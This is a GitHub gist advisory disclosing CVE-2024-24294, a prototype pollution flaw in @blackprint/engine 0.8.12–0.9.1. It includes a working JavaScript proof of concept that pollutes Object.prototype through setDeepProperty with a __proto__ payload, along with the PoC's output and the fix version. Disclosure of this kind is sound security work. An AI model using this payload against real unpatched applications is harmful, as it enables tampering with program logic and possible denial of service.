Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/CVE-2024-24294.md

Last active April 23, 2024 17:59
Show Gist options
  • Save mestrtee/d1eb6e1f7c6dd60d8838c3e56cab634d to your computer and use it in GitHub Desktop.
Save mestrtee/d1eb6e1f7c6dd60d8838c3e56cab634d to your computer and use it in GitHub Desktop.
Download ZIP
[ CVE-2024-24294] Prototype Pollution vulnerability affecting @blackprint/engine, versions >=0.8.12, <=0.9.1
Raw
CVE-2024-24294.md

Overview

Versions of @blackprint/engine from 0.8.12 to 0.9.1 are vulnerable to prototype pollution. The function setDeepProperty recursively assign the source property to the destination with out proper validation which can be exploited by an attacker by modifying the prototype of Object using a payload like: [["__proto__"], "..."]

PoC:

(async () => {
  const lib = await import('@blackprint/engine');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default._utils.setDeepProperty ({},[["__proto__"], "polluted"], true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

Patch:

upgrade to version 0.9.2 or a later version.

References

https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013 https://nvd.nist.gov/vuln/detail/CVE-2024-24294

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment